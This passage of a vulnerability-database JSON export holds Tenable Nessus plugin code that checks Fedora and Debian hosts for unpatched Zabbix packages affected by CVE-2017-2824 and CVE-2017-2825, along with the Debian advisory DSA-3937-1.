Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-d191fb7fce.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101184);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-2824\");\n script_xref(name:\"FEDORA\", value:\"2017-d191fb7fce\");\n\n script_name(english:\"Fedora 24 : zabbix (2017-d191fb7fce)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"- http://www.zabbix.com/rn3.0.8\n\n- http://www.zabbix.com/rn3.0.9\n\n- https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew308\n\n- https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew309\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-d191fb7fce\"\n );\n # https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew309\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2ca35986\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected zabbix package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:zabbix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"zabbix-3.0.9-1.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"zabbix\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:11:25", "description": "- http://www.zabbix.com/rn3.0.8\n\n- http://www.zabbix.com/rn3.0.9\n\n- https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew308\n\n- https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew309\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-03T00:00:00", "title": "Fedora 25 : zabbix (2017-63aca509fb)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2824"], "modified": "2017-07-03T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:zabbix", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-63ACA509FB.NASL", "href": "https://www.tenable.com/plugins/nessus/101181", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-63aca509fb.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101181);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-2824\");\n script_xref(name:\"FEDORA\", value:\"2017-63aca509fb\");\n\n script_name(english:\"Fedora 25 : zabbix (2017-63aca509fb)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"- http://www.zabbix.com/rn3.0.8\n\n- http://www.zabbix.com/rn3.0.9\n\n- https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew308\n\n- https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew309\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-63aca509fb\"\n );\n # https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew309\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2ca35986\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected zabbix package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:zabbix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"zabbix-3.0.9-1.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"zabbix\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:11:16", "description": "- http://www.zabbix.com/rn3.0.8\n\n- http://www.zabbix.com/rn3.0.9\n\n- https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew308\n\n- https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew309\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-17T00:00:00", "title": "Fedora 26 : zabbix (2017-5c8a4ebccd)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2824"], "modified": "2017-07-17T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:zabbix", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-5C8A4EBCCD.NASL", "href": "https://www.tenable.com/plugins/nessus/101639", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-5c8a4ebccd.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101639);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-2824\");\n script_xref(name:\"FEDORA\", value:\"2017-5c8a4ebccd\");\n\n script_name(english:\"Fedora 26 : zabbix (2017-5c8a4ebccd)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"- http://www.zabbix.com/rn3.0.8\n\n- http://www.zabbix.com/rn3.0.9\n\n- https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew308\n\n- https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew309\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-5c8a4ebccd\"\n );\n # https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew309\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2ca35986\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected zabbix package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:zabbix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"zabbix-3.0.9-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"zabbix\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T07:01:18", "description": "According to its self-reported version number, the instance of Zabbix\nrunning on the remote host is 2.0.x prior to 2.0.21, 2.2.x prior to\n2.2.18, 3.0.x prior to 3.0.9, or 3.2.x prior to 3.2.5. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the\n trapper command functionality due to improper handling\n of trapper packets. An unauthenticated, remote attacker\n can exploit this, via a specially crafted set of trapper\n packets, to inject arbitrary commands and execute\n arbitrary code. (CVE-2017-2824 / TALOS-2017-0325)\n\n - A security bypass vulnerability exists in the trapper\n command functionality due to improper handling of\n trapper packets. A man-in-the-middle (MitM) attacker can\n exploit this, via a specially crafted trapper packet, to\n bypass database security checks and write arbitrary data\n to the database. (CVE-2017-2825 / TALOS-2017-0326)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 27, "cvss3": {"score": 7.0, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L"}, "published": "2017-06-05T00:00:00", "title": "Zabbix 2.0.x < 2.0.21 / 2.2.x < 2.2.18 / 3.0.x < 3.0.9 / 3.2.x < 3.2.5 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2825", "CVE-2017-2824"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:zabbix:zabbix"], "id": "ZABBIX_FRONTEND_3_2_5.NASL", "href": "https://www.tenable.com/plugins/nessus/100615", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100615);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\"CVE-2017-2824\", \"CVE-2017-2825\");\n script_bugtraq_id(98083, 98094);\n\n script_name(english:\"Zabbix 2.0.x < 2.0.21 / 2.2.x < 2.2.18 / 3.0.x < 3.0.9 / 3.2.x < 3.2.5 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Zabbix version on the login page.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the instance of Zabbix\nrunning on the remote host is 2.0.x prior to 2.0.21, 2.2.x prior to\n2.2.18, 3.0.x prior to 3.0.9, or 3.2.x prior to 3.2.5. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the\n trapper command functionality due to improper handling\n of trapper packets. An unauthenticated, remote attacker\n can exploit this, via a specially crafted set of trapper\n packets, to inject arbitrary commands and execute\n arbitrary code. (CVE-2017-2824 / TALOS-2017-0325)\n\n - A security bypass vulnerability exists in the trapper\n command functionality due to improper handling of\n trapper packets. A man-in-the-middle (MitM) attacker can\n exploit this, via a specially crafted trapper packet, to\n bypass database security checks and write arbitrary data\n to the database. (CVE-2017-2825 / TALOS-2017-0326)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blog.talosintelligence.com/2017/04/zabbix-multiple-vulns.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.talosintelligence.com/reports/TALOS-2017-0325/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.talosintelligence.com/reports/TALOS-2017-0326/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.zabbix.com/browse/ZBX-12075\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.zabbix.com/browse/ZBX-12076\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Zabbix version 2.0.21 / 2.2.18 / 3.0.9 / 3.2.5 or later.\nAlternatively, to mitigate CVE-2017-2824, delete the three default\nscript entries inside the Zabbix Server database per the\nTALOS-2017-0325 advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-2825\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/05\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zabbix:zabbix\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"zabbix_frontend_detect.nasl\");\n script_require_keys(\"installed_sw/zabbix\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"zabbix\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install['path'];\nver = install['version'];\ninstall_url = build_url(port:port, qs:dir);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nfix = NULL;\n\nif (ver =~ \"^2\\.0\\.([0-9]|[1][0-9]|20|21rc[0-9]+)($|[^0-9])\")\n fix = \"2.0.21\";\n\nelse if (ver =~ \"^2\\.2\\.([0-9]|1[0-7]|18rc[0-9]+)($|[^0-9])\")\n fix = \"2.2.18\";\n\nelse if (ver =~ \"^3\\.0\\.([0-8]|9rc[0-9]+)($|[^0-9])\")\n fix = \"3.0.9\";\n\nelse if (ver =~ \"^3\\.2\\.([0-4]|5rc[0-9]+)($|[^0-9])\")\n fix = \"3.2.5\";\n\nif (!isnull(fix))\n{\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : 2.0.21 / 2.2.18 / 3.0.9 / 3.2.5' +\n '\\n';\n\n security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\n exit(0);\n}\nelse\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Zabbix\", install_url, ver);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:50:32", "description": "Lilith Wyatt discovered two vulnerabilities in the Zabbix network\nmonitoring system which may result in execution of arbitrary code or\ndatabase writes by malicious proxies.", "edition": 27, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-08-14T00:00:00", "title": "Debian DSA-3937-1 : zabbix - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2825", "CVE-2017-2824"], "modified": "2017-08-14T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:zabbix"], "id": "DEBIAN_DSA-3937.NASL", "href": "https://www.tenable.com/plugins/nessus/102444", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3937. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102444);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-2824\", \"CVE-2017-2825\");\n script_xref(name:\"DSA\", value:\"3937\");\n\n script_name(english:\"Debian DSA-3937-1 : zabbix - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Lilith Wyatt discovered two vulnerabilities in the Zabbix network\nmonitoring system which may result in execution of arbitrary code or\ndatabase writes by malicious proxies.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/zabbix\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-3937\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the zabbix packages.\n\nFor the oldstable distribution (jessie), these problems have been\nfixed in version 1:2.2.7+dfsg-2+deb8u3.\n\nFor the stable distribution (stretch), these problems have been fixed\nprior to the initial release.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:zabbix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"zabbix-agent\", reference:\"1:2.2.7+dfsg-2+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"zabbix-frontend-php\", reference:\"1:2.2.7+dfsg-2+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"zabbix-java-gateway\", reference:\"1:2.2.7+dfsg-2+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"zabbix-proxy-mysql\", reference:\"1:2.2.7+dfsg-2+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"zabbix-proxy-pgsql\", reference:\"1:2.2.7+dfsg-2+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"zabbix-proxy-sqlite3\", reference:\"1:2.2.7+dfsg-2+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"zabbix-server-mysql\", reference:\"1:2.2.7+dfsg-2+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"zabbix-server-pgsql\", reference:\"1:2.2.7+dfsg-2+deb8u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-08-12T01:06:51", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2825", "CVE-2017-2824"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3937-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nAugust 12, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : zabbix\nCVE ID : CVE-2017-2824 CVE-2017-2825\n\nLilith Wyatt discovered two vulnerabilities in the Zabbix network\nmonitoring system which may result in execution of arbitrary code or\ndatabase writes by malicious proxies.\n\nFor the oldstable distribution (jessie), these problems have been fixed\nin version 1:2.2.7+dfsg-2+deb8u3.\n\nFor the stable distribution (stretch), these problems have been fixed\nprior to the initial release.\n\nWe recommend that you upgrade your zabbix packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 10, "modified": "2017-08-12T00:24:29", "published": "2017-08-12T00:24:29", "id": "DEBIAN:DSA-3937-1:63B5F", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00198.html", "title": "[SECURITY] [DSA 3937-1] zabbix security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}